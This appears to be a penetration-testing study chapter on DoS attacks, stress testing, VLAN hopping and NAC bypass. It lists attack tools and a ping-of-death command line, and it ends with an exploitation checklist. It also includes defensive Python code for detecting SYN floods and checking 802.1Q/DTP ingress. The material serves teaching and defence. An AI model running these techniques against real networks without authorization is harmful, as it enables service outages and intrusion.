A denial-of-service (DoS) attack is one that prevents the target from performing its normal duties on the network. Although this is typically accomplished by flooding the server with network traffic, it can also be accomplished by crashing a service or consuming all of the server’s resources, including CPU, memory, disk space, or allowed client connections. The attack can be protocol-, operating system-, or service-specific. You can try crafting packets to evade IDS or firewall detection. For network-traffic-based DoS attacks, a single attacker is unlikely to have much (if any) impact. The most serious exploits are distributed denial-of-service (DDoS) attacks, in which thousands or hundreds of thousands of machines (typically in a botnet) are coordinated to attack a single target.

The following list summarizes common DoS attack types, what each one does, and example tools.

  • Packet flood: Create and send massive amounts of TCP, UDP, ICMP, or random packet traffic to the target. Can include different TCP flag variants. Tools: hping3, nemesy, XOIC, Low Orbit Ion Cannon (LOIC), Spike DDoS Toolkit, xcrush-20.
  • SYN flood: Create and send massive amounts of TCP SYN packets. Tools: hping3, Metasploit auxiliary/dos/tcp/synflood, Spike DDoS Toolkit, xcrush-20.
  • Ping of Death: Send ICMP ECHO REQUESTs that are larger than 65,536 bytes, causing the target to crash, freeze, or reboot. Tools: jolt, xcrush-20, eugenics.pl, Crazy Pinger, ping.exe (e.g., ping -l 65510 your.target.ip.address).
  • ICMP/UDP fragmentation attack: Variant of UDP flood or Ping of Death. Send the target UDP or ICMP fragments that, when reassembled, are too large for the network’s MTU. Tools: hping3, spike.sh, eugenics.pl.
  • TCP fragmentation attack: Send the target TCP fragments that have overlapping sequence numbers and cannot be reassembled. Windows NT, Windows 95, and Linux versions prior to version 2.1.63 are most vulnerable. Tools: Teardrop, NewTear, Bonk, Boink, Targa, xcrush-20, eugenics.pl.
  • Smurf attack: Send large numbers of spoofed ICMP ECHO REQUESTs to intermediate devices that all respond to a single target. Tools: hping3, xcrush-20, eugenics.pl.
  • Fraggle attack: Same as a Smurf attack, except it uses UDP instead of ICMP. Tools: xcrush-20, eugenics.pl.
  • Land attack: Send a spoofed packet where source and destination IP are the same. The target floods itself with packets. Tools: hping3, Land, Targa, LaTierra, xcrush-20, eugenics.pl.
  • SMB malformed request: Send a malformed request to an SMB named pipe, causing a Blue Stop Screen (Blue Screen of Death) on Windows. Tools: SMBDie, Bitchslap.
  • Slowloris: Keep as many fake web connections as possible open for as long as possible, until the maximum number of allowed connections is reached. Allows one web server to take down another without impacting other ports or services on the target network. Tools: Slowloris script, R-U-Dead-Yet (RUDY).
  • NTP amplification: Send spoofed NTP queries to publicly available NTP servers to overwhelm a target with UDP traffic. Tools: NTPDos, NTPDoser, Saddam.
  • HTTP flood attack: Use seemingly legitimate HTTP GET or POST requests to attack a web server. Does not require spoofing or malformed packets, but can consume a high amount of resources with a single request. Tools: High Orbit Ion Cannon (HOIC), Low Orbit Ion Cannon (LOIC), XOIC, HULK, DDOSIM, Tor’s Hammer, PyLoris, OWASP DOS HTTP POST, DAVOSET, GoldenEye HTTP Denial Of Service Tool, Spike DDoS Toolkit.
  • DNS flood attack: Consume all CPU or memory of a DNS server with a flood of requests. Tools: zodiac, DNS Flood, Hyenae, Spike DDoS Toolkit.
  • DNS amplification attack: Like Smurf or other amplification attacks, multiple public DNS servers receive spoofed queries and respond to a target. Tools: Saddam, Tsunami, DDoS Attack.

Note: Many of these tools can be used for multiple DoS attack types. You may find variants with different features.

DoS attack example

The following figure shows the command and output from a web server SYN flood generated from the hping3 tool.

[Figure: Hping3 web server SYN flood]
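A SYN flood like the one in the figure leaves a distinctive trace on the target side: a pile of half-open connections to one port from sources that never finish the handshake. The following Python is an added example (not from the page or from hping3) that replays tcpdump-style packet summaries, tracks each client's handshake state, and reports targets whose half-open count crosses a threshold together with how many distinct sources are involved. The packet lines are constructed; the line format and the threshold are assumptions.

```python
"""SYN flood detection from packet summaries (added example, not from the
original page). Replays tcpdump-style lines
"<time> <src>:<sport> > <dst>:<dport> [<flags>]", tracks each client's
three-way handshake and reports targets with many half-open connections
(SYN seen, handshake never completed). The capture below is constructed."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

PKT_RE = re.compile(
    r"^(?P<ts>[\d.]+) (?P<src>[\d.]+):(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) \[(?P<flags>[A-Z.]*)\]$")


def parse_packet(line: str) -> Optional[Dict[str, str]]:
    m = PKT_RE.match(line.strip())
    return m.groupdict() if m else None


def connection_states(lines) -> Dict[Tuple[str, str, str, str], str]:
    """Replay packets; returns (src, sport, dst, dport) -> 'half-open' or 'open'."""
    state: Dict[Tuple[str, str, str, str], str] = {}
    for line in lines:
        p = parse_packet(line)
        if p is None:
            continue
        key = (p["src"], p["sport"], p["dst"], p["dport"])
        reverse = (p["dst"], p["dport"], p["src"], p["sport"])
        flags = p["flags"]
        if flags == "S":                       # client SYN opens a half-open entry
            state[key] = "half-open"
        elif flags == "S.":                    # server SYN-ACK: still waiting on the client
            continue
        elif "R" in flags or "F" in flags:     # reset/close from either side ends tracking
            state.pop(key, None)
            state.pop(reverse, None)
        elif key in state:                     # client ACK completes the handshake
            state[key] = "open"
    return state


def detect_syn_flood(lines, threshold: int = 20) -> List[Tuple[str, int, int]]:
    """Return (target, half_open_count, distinct_sources) for targets over threshold."""
    per_target: Dict[str, List] = defaultdict(lambda: [0, set()])
    for (src, _sport, dst, dport), st in connection_states(lines).items():
        if st == "half-open":
            entry = per_target[f"{dst}:{dport}"]
            entry[0] += 1
            entry[1].add(src)
    return [(target, count, len(sources))
            for target, (count, sources) in per_target.items() if count >= threshold]


def sample_capture() -> List[str]:
    """Constructed: one real client completes its handshake, then 40 spoofed SYNs arrive."""
    lines = [
        "1.000 10.0.0.5:51000 > 10.0.0.80:80 [S]",
        "1.001 10.0.0.80:80 > 10.0.0.5:51000 [S.]",
        "1.002 10.0.0.5:51000 > 10.0.0.80:80 [.]",
        "1.003 10.0.0.5:51000 > 10.0.0.80:80 [P.]",
    ]
    for i in range(40):     # spoofed sources never answer the server's SYN-ACK
        lines.append(f"2.{i:03d} 203.0.113.{i + 1}:{40000 + i} > 10.0.0.80:80 [S]")
        lines.append(f"2.{i:03d} 10.0.0.80:80 > 203.0.113.{i + 1}:{40000 + i} [S.]")
    return lines


if __name__ == "__main__":
    print(detect_syn_flood(sample_capture()))
```

On the sample the legitimate client ends in the "open" state and is ignored, while the 40 spoofed SYNs report as 40 half-open connections from 40 distinct sources against 10.0.0.80:80. The distinct-source count is what separates a flood from one misbehaving client, and it is also the signal that SYN cookies or a per-source rate limit will not be enough on their own.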

Note: You can search for Metasploit DoS modules at the msf console. For example, to search for DoS attacks that involve DNS, enter search type:auxiliary name:dos -S dns.

Stress Testing

Stress testing is a euphemism for conducting a denial-of-service attack against a target. You can use scripts, bots, or other tools to deliberately and intensively attack a server or service to see how it performs. Some stress testers simply flood the target with distributed denial-of-service (DDoS) traffic. Others are application-specific and simulate very high numbers of actual user requests. An administrator might use stress testing to ensure that a website can withstand attacks or abnormally high traffic.

Because the intent is to render the service non-functional, a pen tester would need authorization to stress test a production machine. Additionally, the client would need to understand the implications of stress testing live servers. There are many commercially available stress testing services and products online. There are also several sites online that will rent you their illegal botnet for “stress testing” purposes. These sites charge a nominal price by the hour.


VLAN Hopping

VLAN hopping is the act of illegally moving from one VLAN to another. A VLAN (virtual LAN) is a logical grouping of switch ports that can extend across any number of switches on an Ethernet campus. Its purpose is to organize devices by security need and/or to limit the impact of broadcast traffic on the larger network. A switched network can have (nearly) any number of VLANs that extend across the campus, each being its own broadcast domain with its own subnet ID. Metro Ethernet Metropolitan Area Networks (MANs) can even extend a company’s VLANs to other locations around town. The most common use cases are to segregate the network by department, device type, or security level.

Because VLANs are logically segmented away from the rest of the network, you would ordinarily have to use a router to move traffic between them. This allows you to set access control lists and other policies to control which hosts can access hosts in other VLANs. Ordinarily, a switch port or Wi-Fi connection can only belong to one VLAN at a time, and cannot change unless specifically configured by the network administrator. This means that whatever port or SSID the device connects to determines the VLAN that device is in. You would have to plug into a different port or connect to a different WLAN to change your VLAN. Or, if permitted, a router would have to route your traffic from your existing VLAN to other VLANs. There are, however, ways to bypass this restriction. Some examples include:

  • Overflowing the MAC table on a vulnerable switch so that it behaves like a hub, repeating frames out all ports.
  • Configuring the interface of an attacker machine to become a trunk port. It will then negotiate an unauthorized trunk link with the switch, which allows traffic from any VLAN to flow over that link. This allows the attacker machine to then apply the desired VLAN tag to malicious packets. The switch will then deliver those packets to the restricted VLAN.

[Figure: Using an unauthorized trunk link to VLAN hop]

One popular VLAN hopping tool is Frogger. It is a command-line tool that automatically sets up a trunk link, identifies VLAN IDs that are in use, and tags your traffic for the desired VLAN.

https://github.com/nccgroup/vlan-hopping---frogger

Note: For more information about Frogger, see https://www.commonexploits.com/frogger-the-vlan-hopper/.

Note: In some cases, VLAN membership for a device is dynamically determined by its MAC address. The network administrator pre-creates a list of VLANs and the MAC addresses that belong to them. When the device is plugged in, its MAC address is checked against the VLAN database and the corresponding VLAN is dynamically assigned to that port.
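The trunk-negotiation hop described above only works when the switch port accepts DTP from a client and honours whatever tags arrive, so the defence is the port's ingress policy (access ports that never negotiate and drop tagged frames, trunks with an explicit allowed-VLAN list and a tagged native VLAN). The Python below is an added example (not from the page or from Frogger) that models that policy: it parses stacked 802.1Q tags, applies access/trunk rules, and recognises a DTP frame by its destination multicast address and SNAP protocol ID. Frames and MAC addresses are constructed; the requirement to tag the native VLAN on trunks is an assumed hardening setting, and the DTP constants are those of Cisco's published protocol encoding.

```python
"""802.1Q ingress policy and DTP detection (added example, not from the
original page). Mirrors what a hardened switch port should do with a
received frame: an access port drops anything that already carries a VLAN
tag, a trunk admits only its allowed VLANs and rejects stacked tags, and a
frame to Cisco's DTP multicast with the DTP SNAP protocol ID is reported
because a client should never negotiate a trunk. Frames are constructed."""
import struct
from typing import List, Tuple

TPIDS = {0x8100, 0x88A8, 0x9100}          # 802.1Q, 802.1ad (QinQ), legacy QinQ
DTP_DST = bytes.fromhex("01000ccccccc")   # Cisco shared multicast (CDP/VTP/DTP)
SNAP_CISCO_DTP = b"\xaa\xaa\x03\x00\x00\x0c\x20\x04"   # LLC SNAP, OUI 00:00:0c, PID 0x2004


def _mac(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def build_tagged_frame(dst: str, src: str, vids: List[int], ethertype: int = 0x0800) -> bytes:
    """Construct an Ethernet frame with zero or more stacked 802.1Q tags (PCP/DEI = 0)."""
    frame = _mac(dst) + _mac(src)
    for vid in vids:
        frame += struct.pack("!HH", 0x8100, vid & 0x0FFF)
    return frame + struct.pack("!H", ethertype) + b"\x00" * 46


def build_dtp_frame(src: str) -> bytes:
    """Construct the outer layers of a DTP announcement (TLV payload left empty)."""
    return DTP_DST + _mac(src) + struct.pack("!H", 8) + SNAP_CISCO_DTP


def parse_vlan_tags(frame: bytes) -> Tuple[List[int], int]:
    """Return (VLAN IDs outermost first, the ethertype/length field after the tags)."""
    off, vids = 12, []
    while len(frame) >= off + 4:
        tpid = struct.unpack("!H", frame[off:off + 2])[0]
        if tpid not in TPIDS:
            break
        vids.append(struct.unpack("!H", frame[off + 2:off + 4])[0] & 0x0FFF)
        off += 4
    if len(frame) < off + 2:
        return vids, 0
    return vids, struct.unpack("!H", frame[off:off + 2])[0]


def is_dtp(frame: bytes) -> bool:
    return frame[:6] == DTP_DST and frame[14:22] == SNAP_CISCO_DTP


def check_ingress(frame: bytes, port_mode: str, allowed_vlans=frozenset()) -> str:
    """Decide what a switch port should do with a received frame."""
    if is_dtp(frame):
        return "alert: DTP trunk negotiation attempt from this port"
    vids, _ = parse_vlan_tags(frame)
    if port_mode == "access":
        return "drop: tagged frame on access port" if vids else "ok"
    if port_mode == "trunk":
        if not vids:
            return "drop: untagged frame on trunk (native VLAN must be tagged)"
        if len(vids) > 1:
            return "drop: stacked 802.1Q tags"
        if vids[0] not in allowed_vlans:
            return f"drop: VLAN {vids[0]} not allowed on this trunk"
        return "ok"
    return "drop: unknown port mode"
```

The "alert" outcome is the one that matters for the Frogger-style hop: a workstation port that ever sees a DTP frame from the client side is either misconfigured (dynamic desirable/auto) or under attack, and the fix is switchport mode access with DTP negotiation turned off, plus an explicit allowed-VLAN list on real trunks.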


NAC Bypass Attacks

Network Access Control (NAC) is a system meant to restrict device access to the internal network. It disallows unauthorized or “unhealthy” devices from connecting. “Unhealthy” devices are ones that do not have the latest antivirus update, security patch, proper firewall setting, security policy settings, etc. Usually unauthorized or unhealthy devices are redirected to a captive guest portal where they remain quarantined in a separate VLAN until they are given authorization or they remediate all of their issues. For NAC to work, it requires infrastructure devices to enforce the restrictions. These enforcers are typically points of entry such as a network switch, a WAP, or a remote access/VPN server. They can also be DHCP servers. Enforcers relay client connection requests to the Network Policy Server (NPS) and then permit or deny the connection based on the NPS’s decision.

Although a pen tester might be able to make unauthorized changes to the NPS, this would entail a lot of work. There are a few easier ways to try to bypass NAC. The most common include:

  • Spoofing the MAC and IP addresses of a device that cannot natively participate in NAC, such as a VoIP phone or printer. These devices will be whitelisted by the administrator, and often there is no mechanism to verify that the MAC address truly belongs to the device.
  • Using IPv6 rather than IPv4 on the unauthorized device. Most servers have IPv6 addresses by default, and are running IPv6, but administrators still forget to include IPv6 rules in firewalls and NAC policy.
  • Using a rogue wireless access point to get an authorized device to connect with an attacker machine. The attacker machine compromises the authorized device, then uses it to relay malicious traffic into the protected network.

[Figure: Spoofing the MAC of an approved device to bypass NAC]


Guidelines for Exploiting Network-Based Vulnerabilities

Here are some guidelines you can follow when exploiting network-based vulnerabilities:

  • Conduct active reconnaissance, including scanning and fingerprinting on the target first, then research possible exploits you can use.
  • Use sniffing and eavesdropping to obtain information needed for the exploit.
  • Use ARP poisoning when conducting man-in-the-middle attacks.
  • Use hijacking to take over client sessions.
  • Choose your exploits based on the target service or protocol.
  • Use DNS cache poisoning and other name resolution exploits to redirect targets when ARP poisoning isn’t practical.
  • Use network authentication brute forcing to crack passwords.
  • Use pass the hash attacks when password cracking isn’t practical.
  • Be careful when using DoS or stress testing attacks, as they are likely to make the server or service unavailable.
  • Use VLAN hopping if you need access to a restricted VLAN.
  • Use NAC bypassing techniques if points of entry into the network are controlled by a network policy or NAC server.
